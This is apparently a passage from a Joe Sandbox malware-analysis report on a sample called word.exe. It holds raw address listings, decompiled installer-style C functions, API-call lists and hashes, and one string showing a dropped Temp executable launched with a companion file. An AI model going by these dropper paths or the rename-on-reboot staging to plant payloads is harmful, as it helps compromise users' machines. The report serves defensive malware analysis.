                                      0x004052fb
                                      0x00405306
                                      0x0040530b
                                      0x00405312
                                      0x00405317
                                      0x0040531b
                                      0x00405326
                                      0x00405326
                                      0x0040532a
                                      0x0040532e
                                      0x00405332
                                      0x00405345
                                      0x00405334
                                      0x00405334
                                      0x0040533b
                                      0x00405341
                                      0x0040533d
                                      0x0040533d
                                      0x0040533d
                                      0x0040533b
                                      0x00405349
                                      0x0040534b
                                      0x0040535e
                                      0x00405361
                                      0x00405364
                                      0x00405364
                                      0x0040532e
                                      0x00000000
                                      0x0040531b
                                      0x004052fd
                                      0x00405304
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004053be
                                      0x004053be
                                      0x004053c5
                                      0x00405436
                                      0x0040543e
                                      0x00405446
                                      0x00405446
                                      0x0040544f
                                      0x00405451
                                      0x00405458
                                      0x0040545b
                                      0x0040545b
                                      0x00405461
                                      0x00405468
                                      0x0040546b
                                      0x0040546b
                                      0x00405471
                                      0x00405477
                                      0x0040547d
                                      0x0040547d
                                      0x0040548a
                                      0x004055eb
                                      0x004055f2
                                      0x0040560f
                                      0x00405615
                                      0x00405627
                                      0x00405627
                                      0x00000000
                                      0x00405490
                                      0x00405492
                                      0x00405497
                                      0x0040549c
                                      0x004054a1
                                      0x004054a3
                                      0x004054a3
                                      0x004054a4
                                      0x004054a5
                                      0x004054a7
                                      0x004054a7
                                      0x004054af
                                      0x004054f0
                                      0x004054f2
                                      0x00405502
                                      0x00405505
                                      0x0040550a
                                      0x00405511
                                      0x00405514
                                      0x004055b6
                                      0x004055bf
                                      0x004055c7
                                      0x004055c7
                                      0x004055d5
                                      0x004055e6
                                      0x004055e6
                                      0x00000000
                                      0x004055d5
                                      0x0040551a
                                      0x0040551d
                                      0x00405523
                                      0x00405528
                                      0x0040552a
                                      0x0040552c
                                      0x00405532
                                      0x00405539
                                      0x0040553e
                                      0x00405545
                                      0x00405548
                                      0x00405548
                                      0x0040554f
                                      0x0040555b
                                      0x0040555f
                                      0x00405561
                                      0x00405561
                                      0x00405551
                                      0x00405553
                                      0x00405553
                                      0x00405581
                                      0x0040558d
                                      0x0040559c
                                      0x0040559c
                                      0x0040559e
                                      0x004055a1
                                      0x004055aa
                                      0x00000000
                                      0x004054b1
                                      0x004054bc
                                      0x004054bf
                                      0x004054c4
                                      0x004054c6
                                      0x004054ca
                                      0x004054da
                                      0x004054e4
                                      0x004054e6
                                      0x004054e9
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004054cc
                                      0x004054cc
                                      0x004054d2
                                      0x004054d4
                                      0x004054d4
                                      0x004054d5
                                      0x004054d6
                                      0x00000000
                                      0x004054cc
                                      0x004054af
                                      0x0040548a
                                      0x004053cd
                                      0x00000000
                                      0x004053e3
                                      0x004053ed
                                      0x004053f2
                                      0x00000000
                                      0x00000000
                                      0x00405404
                                      0x00405409
                                      0x00405415
                                      0x00405415
                                      0x00405417
                                      0x00405426
                                      0x00405428
                                      0x0040542c
                                      0x0040542f
                                      0x00000000
                                      0x0040542f
                                      0x004053cd
                                      0x00405083
                                      0x00405088
                                      0x00405091
                                      0x00405098
                                      0x004050aa
                                      0x004050b5
                                      0x004050bb
                                      0x004050c9
                                      0x004050dd
                                      0x004050e2
                                      0x004050ef
                                      0x004050f4
                                      0x0040510a
                                      0x0040511b
                                      0x00405128
                                      0x00405128
                                      0x0040512b
                                      0x00405131
                                      0x00405133
                                      0x00405136
                                      0x0040513b
                                      0x00405140
                                      0x00405142
                                      0x00405142
                                      0x00405162
                                      0x00405162
                                      0x00405164
                                      0x00405165
                                      0x0040516a
                                      0x00405170
                                      0x00405174
                                      0x00405179
                                      0x00405181
                                      0x00405185
                                      0x0040518a
                                      0x0040518f
                                      0x00405197
                                      0x0040519a
                                      0x0040526a
                                      0x0040527d
                                      0x00000000
                                      0x004051a0
                                      0x004051a3
                                      0x004051a6
                                      0x004051a9
                                      0x004051a9
                                      0x004051af
                                      0x004051b8
                                      0x004051bb
                                      0x004051bf
                                      0x004051c2
                                      0x004051c5
                                      0x004051ce
                                      0x004051d7
                                      0x004051da
                                      0x004051dd
                                      0x004051e0
                                      0x0040521e
                                      0x00405249
                                      0x00405220
                                      0x0040522f
                                      0x0040522f
                                      0x004051e2
                                      0x004051e5
                                      0x004051f3
                                      0x004051fd
                                      0x00405205
                                      0x0040520c
                                      0x00405217
                                      0x00405217
                                      0x004051e0
                                      0x0040524f
                                      0x00405250
                                      0x0040525c
                                      0x0040525c
                                      0x00405268
                                      0x00405283
                                      0x00405286
                                      0x004052a3
                                      0x00000000
                                      0x00405288
                                      0x0040528d
                                      0x00405296
                                      0x00405629
                                      0x0040563b
                                      0x0040563b
                                      0x00405286
                                      0x00000000
                                      0x00405268
                                      0x0040519a

                                      APIs
                                      • GetDlgItem.USER32(?,000003F9), ref: 00405049
                                      • GetDlgItem.USER32(?,00000408), ref: 00405054
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                      • LoadImageW.USER32 ref: 004050B5
                                      • SetWindowLongW.USER32 ref: 004050CE
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                      • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                      • DeleteObject.GDI32(00000000), ref: 0040512B
                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                        • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                      • SetWindowLongW.USER32 ref: 0040527D
                                      • ShowWindow.USER32(?,00000005), ref: 0040528D
                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                      • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                      • GlobalFree.KERNEL32(?), ref: 0040546B
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                      • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                      • ShowWindow.USER32(?,00000000), ref: 00405615
                                      • GetDlgItem.USER32(?,000003FE), ref: 00405620
                                      • ShowWindow.USER32(00000000), ref: 00405627
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                      • String ID: $M$N
                                      • API String ID: 2564846305-813528018
                                      • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                      • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                      • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                      • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 91%
                                      			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                      				intOrPtr _v8;
                                      				int _v12;
                                      				void* _v16;
                                      				struct HWND__* _t56;
                                      				signed int _t75;
                                      				signed short* _t76;
                                      				signed short* _t78;
                                      				long _t92;
                                      				int _t103;
                                      				signed int _t110;
                                      				intOrPtr _t113;
                                      				WCHAR* _t114;
                                      				signed int* _t116;
                                      				WCHAR* _t117;
                                      				struct HWND__* _t118;
                                      
                                      				if(_a8 != 0x110) {
                                      					if(_a8 != 0x111) {
                                      						L13:
                                      						if(_a8 != 0x4e) {
                                      							if(_a8 == 0x40b) {
                                      								 *0x421714 =  *0x421714 + 1;
                                      							}
                                      							L27:
                                      							_t114 = _a16;
                                      							L28:
                                      							return E0040462B(_a8, _a12, _t114);
                                      						}
                                      						_t56 = GetDlgItem(_a4, 0x3e8);
                                      						_t114 = _a16;
                                      						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                      							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                      							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                      							_v12 = _t103;
                                      							_v16 = _t113;
                                      							_v8 = 0x428200;
                                      							if(_t103 - _t113 < 0x800) {
                                      								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                      								SetCursor(LoadCursorW(0, 0x7f02));
                                      								_push(1);
                                      								E00404A32(_a4, _v8);
                                      								SetCursor(LoadCursorW(0, 0x7f00));
                                      								_t114 = _a16;
                                      							}
                                      						}
                                      						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                      							goto L28;
                                      						} else {
                                      							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                      								SendMessageW( *0x42a268, 0x111, 1, 0);
                                      							}
                                      							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                      								SendMessageW( *0x42a268, 0x10, 0, 0);
                                      							}
                                      							return 1;
                                      						}
                                      					}
                                      					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
                                      						goto L27;
                                      					} else {
                                      						_t116 =  *0x422720 + 0x14;
                                      						if(( *_t116 & 0x00000020) == 0) {
                                      							goto L27;
                                      						}
                                      						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                      						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                      						E00404A0E();
                                      						goto L13;
                                      					}
                                      				}
                                      				_t117 = _a16;
                                      				_t75 =  *(_t117 + 0x30);
                                      				if(_t75 < 0) {
                                      					_t75 =  *( *0x42923c - 4 + _t75 * 4);
                                      				}
                                      				_t76 =  *0x42a298 + _t75 * 2;
                                      				_t110 =  *_t76 & 0x0000ffff;
                                      				_a8 = _t110;
                                      				_t78 =  &(_t76[1]);
                                      				_a16 = _t78;
                                      				_v16 = _t78;
                                      				_v12 = 0;
                                      				_v8 = E00404734;
                                      				if(_t110 != 2) {
                                      					_v8 = E004046FA;
                                      				}
                                      				_push( *((intOrPtr*)(_t117 + 0x34)));
                                      				_push(0x22);
                                      				E004045C4(_a4);
                                      				_push( *((intOrPtr*)(_t117 + 0x38)));
                                      				_push(0x23);
                                      				E004045C4(_a4);
                                      				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                      				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                      				_t118 = GetDlgItem(_a4, 0x3e8);
                                      				E004045F9(_t118);
                                      				SendMessageW(_t118, 0x45b, 1, 0);
                                      				_t92 =  *( *0x42a270 + 0x68);
                                      				if(_t92 < 0) {
                                      					_t92 = GetSysColor( ~_t92);
                                      				}
                                      				SendMessageW(_t118, 0x443, 0, _t92);
                                      				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                      				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                      				 *0x421714 = 0;
                                      				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                      				 *0x421714 = 0;
                                      				return 0;
                                      			}


















                                      0x00404795
                                      0x004048c2
                                      0x0040491f
                                      0x00404923
                                      0x004049f0
                                      0x004049f2
                                      0x004049f2
                                      0x004049f8
                                      0x004049f8
                                      0x004049fb
                                      0x00000000
                                      0x00404a02
                                      0x00404931
                                      0x00404937
                                      0x00404941
                                      0x0040494c
                                      0x0040494f
                                      0x00404952
                                      0x0040495d
                                      0x00404960
                                      0x00404967
                                      0x00404974
                                      0x00404985
                                      0x0040498b
                                      0x00404993
                                      0x004049a1
                                      0x004049a7
                                      0x004049a7
                                      0x00404967
                                      0x004049b1
                                      0x00000000
                                      0x004049bc
                                      0x004049c0
                                      0x004049d0
                                      0x004049d0
                                      0x004049d6
                                      0x004049e2
                                      0x004049e2
                                      0x00000000
                                      0x004049e6
                                      0x004049b1
                                      0x004048cd
                                      0x00000000
                                      0x004048df
                                      0x004048e4
                                      0x004048ea
                                      0x00000000
                                      0x00000000
                                      0x00404913
                                      0x00404915
                                      0x0040491a
                                      0x00000000
                                      0x0040491a
                                      0x004048cd
                                      0x0040479b
                                      0x0040479e
                                      0x004047a3
                                      0x004047b4
                                      0x004047b4
                                      0x004047bc
                                      0x004047bf
                                      0x004047c3
                                      0x004047c6
                                      0x004047ca
                                      0x004047cd
                                      0x004047d0
                                      0x004047d3
                                      0x004047da
                                      0x004047dc
                                      0x004047dc
                                      0x004047e6
                                      0x004047f3
                                      0x004047fd
                                      0x00404802
                                      0x00404805
                                      0x0040480a
                                      0x00404821
                                      0x00404828
                                      0x0040483b
                                      0x0040483e
                                      0x00404852
                                      0x00404859
                                      0x0040485e
                                      0x00404863
                                      0x00404863
                                      0x00404871
                                      0x0040487f
                                      0x00404891
                                      0x00404896
                                      0x004048a6
                                      0x004048a8
                                      0x00000000

                                      APIs
                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
                                      • GetDlgItem.USER32(?,000003E8), ref: 00404835
                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                      • GetSysColor.USER32 ref: 00404863
                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                      • lstrlenW.KERNEL32(?), ref: 00404884
                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                      • GetDlgItem.USER32(?,0000040A), ref: 004048FF
                                      • SendMessageW.USER32(00000000), ref: 00404906
                                      • GetDlgItem.USER32(?,000003E8), ref: 00404931
                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                      • LoadCursorW.USER32 ref: 00404982
                                      • SetCursor.USER32(00000000), ref: 00404985
                                      • LoadCursorW.USER32 ref: 0040499E
                                      • SetCursor.USER32(00000000), ref: 004049A1
                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                      Strings
                                      • N, xrefs: 0040491F
                                      • "C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dl, xrefs: 00404960
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                      • String ID: "C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dl$N
                                      • API String ID: 3103080414-408629887
                                      • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                      • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                      • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                      • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004062AE(void* __ecx) {
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				long _t12;
                                      				long _t24;
                                      				char* _t31;
                                      				int _t37;
                                      				void* _t38;
                                      				intOrPtr* _t39;
                                      				long _t42;
                                      				WCHAR* _t44;
                                      				void* _t46;
                                      				void* _t48;
                                      				void* _t49;
                                      				void* _t52;
                                      				void* _t53;
                                      
                                      				_t38 = __ecx;
                                      				_t44 =  *(_t52 + 0x14);
                                      				 *0x426de8 = 0x55004e;
                                      				 *0x426dec = 0x4c;
                                      				if(_t44 == 0) {
                                      					L3:
                                      					_t2 = _t52 + 0x1c; // 0x4275e8
                                      					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
                                      					if(_t12 != 0 && _t12 <= 0x400) {
                                      						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
                                      						_t53 = _t52 + 0x10;
                                      						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
                                      						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
                                      						_t48 = _t12;
                                      						 *(_t53 + 0x18) = _t48;
                                      						if(_t48 != 0xffffffff) {
                                      							_t42 = GetFileSize(_t48, 0);
                                      							_t6 = _t37 + 0xa; // 0xa
                                      							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                      							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
                                      								L18:
                                      								return CloseHandle(_t48);
                                      							} else {
                                      								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
                                      									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
                                      									if(_t49 == 0) {
                                      										_t48 =  *(_t53 + 0x18);
                                      										L16:
                                      										_t24 = _t42;
                                      										L17:
                                      										E00406113(_t24 + _t46, 0x4269e8, _t37);
                                      										SetFilePointer(_t48, 0, 0, 0);
                                      										E0040620A(_t48, _t46, _t42 + _t37);
                                      										GlobalFree(_t46);
                                      										goto L18;
                                      									}
                                      									_t39 = _t46 + _t42;
                                      									_t31 = _t39 + _t37;
                                      									while(_t39 > _t49) {
                                      										 *_t31 =  *_t39;
                                      										_t31 = _t31 - 1;
                                      										_t39 = _t39 - 1;
                                      									}
                                      									_t24 = _t49 - _t46 + 1;
                                      									_t48 =  *(_t53 + 0x18);
                                      									goto L17;
                                      								}
                                      								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                      								_t42 = _t42 + 0xa;
                                      								goto L16;
                                      							}
                                      						}
                                      					}
                                      				} else {
                                      					CloseHandle(E00406158(_t44, 0, 1));
                                      					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
                                      					if(_t12 != 0 && _t12 <= 0x400) {
                                      						goto L3;
                                      					}
                                      				}
                                      				return _t12;
                                      			}



















                                      0x004062ae
                                      0x004062b7
                                      0x004062be
                                      0x004062c8
                                      0x004062dc
                                      0x00406304
                                      0x0040630b
                                      0x0040630f
                                      0x00406313
                                      0x00406333
                                      0x0040633a
                                      0x00406344
                                      0x00406351
                                      0x00406356
                                      0x0040635b
                                      0x0040635f
                                      0x0040636e
                                      0x00406370
                                      0x0040637d
                                      0x00406381
                                      0x0040641c
                                      0x00000000
                                      0x00406397
                                      0x004063a4
                                      0x004063c8
                                      0x004063cc
                                      0x004063eb
                                      0x004063ef
                                      0x004063ef
                                      0x004063f1
                                      0x004063fa
                                      0x00406405
                                      0x00406410
                                      0x00406416
                                      0x00000000
                                      0x00406416
                                      0x004063ce
                                      0x004063d1
                                      0x004063dc
                                      0x004063d8
                                      0x004063da
                                      0x004063db
                                      0x004063db
                                      0x004063e3
                                      0x004063e5
                                      0x00000000
                                      0x004063e5
                                      0x004063af
                                      0x004063b5
                                      0x00000000
                                      0x004063b5
                                      0x00406381
                                      0x0040635f
                                      0x004062de
                                      0x004062e9
                                      0x004062f2
                                      0x004062f6
                                      0x00000000
                                      0x00000000
                                      0x004062f6
                                      0x00406427

                                      APIs
                                      • CloseHandle.KERNEL32(00000000), ref: 004062E9
                                      • GetShortPathNameW.KERNEL32 ref: 004062F2
                                        • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                        • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                      • GetShortPathNameW.KERNEL32 ref: 0040630F
                                      • wsprintfA.USER32 ref: 0040632D
                                      • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                      • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                      • GlobalFree.KERNEL32(00000000), ref: 00406416
                                      • CloseHandle.KERNEL32(00000000), ref: 0040641D
                                        • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 0040615C
                                        • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                      • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                      • API String ID: 2171350718-2295842750
                                      • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                      • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                      • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                      • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 90%
                                      			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                      				struct tagLOGBRUSH _v16;
                                      				struct tagRECT _v32;
                                      				struct tagPAINTSTRUCT _v96;
                                      				struct HDC__* _t70;
                                      				struct HBRUSH__* _t87;
                                      				struct HFONT__* _t94;
                                      				long _t102;
                                      				signed int _t126;
                                      				struct HDC__* _t128;
                                      				intOrPtr _t130;
                                      
                                      				if(_a8 == 0xf) {
                                      					_t130 =  *0x42a270;
                                      					_t70 = BeginPaint(_a4,  &_v96);
                                      					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                      					_a8 = _t70;
                                      					GetClientRect(_a4,  &_v32);
                                      					_t126 = _v32.bottom;
                                      					_v32.bottom = _v32.bottom & 0x00000000;
                                      					while(_v32.top < _t126) {
                                      						_a12 = _t126 - _v32.top;
                                      						asm("cdq");
                                      						asm("cdq");
                                      						asm("cdq");
                                      						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                      						_t87 = CreateBrushIndirect( &_v16);
                                      						_v32.bottom = _v32.bottom + 4;
                                      						_a16 = _t87;
                                      						FillRect(_a8,  &_v32, _t87);
                                      						DeleteObject(_a16);
                                      						_v32.top = _v32.top + 4;
                                      					}
                                      					if( *(_t130 + 0x58) != 0xffffffff) {
                                      						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                      						_a16 = _t94;
                                      						if(_t94 != 0) {
                                      							_t128 = _a8;
                                      							_v32.left = 0x10;
                                      							_v32.top = 8;
                                      							SetBkMode(_t128, 1);
                                      							SetTextColor(_t128,  *(_t130 + 0x58));
                                      							_a8 = SelectObject(_t128, _a16);
                                      							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
                                      							SelectObject(_t128, _a8);
                                      							DeleteObject(_a16);
                                      						}
                                      					}
                                      					EndPaint(_a4,  &_v96);
                                      					return 0;
                                      				}
                                      				_t102 = _a16;
                                      				if(_a8 == 0x46) {
                                      					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                      					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
                                      				}
                                      				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                      			}













                                      0x0040100a
                                      0x00401039
                                      0x00401047
                                      0x0040104d
                                      0x00401051
                                      0x0040105b
                                      0x00401061
                                      0x00401064
                                      0x004010f3
                                      0x00401089
                                      0x0040108c
                                      0x004010a6
                                      0x004010bd
                                      0x004010cc
                                      0x004010cf
                                      0x004010d5
                                      0x004010d9
                                      0x004010e4
                                      0x004010ed
                                      0x004010ef
                                      0x004010ef
                                      0x00401100
                                      0x00401105
                                      0x0040110d
                                      0x00401110
                                      0x00401112
                                      0x00401118
                                      0x0040111f
                                      0x00401126
                                      0x00401130
                                      0x00401142
                                      0x00401156
                                      0x00401160
                                      0x00401165
                                      0x00401165
                                      0x00401110
                                      0x0040116e
                                      0x00000000
                                      0x00401178
                                      0x00401010
                                      0x00401013
                                      0x00401015
                                      0x0040101f
                                      0x0040101f
                                      0x00000000

                                      APIs
                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                      • BeginPaint.USER32(?,?), ref: 00401047
                                      • GetClientRect.USER32 ref: 0040105B
                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                      • FillRect.USER32 ref: 004010E4
                                      • DeleteObject.GDI32(?), ref: 004010ED
                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                      • SelectObject.GDI32(00000000,?), ref: 00401140
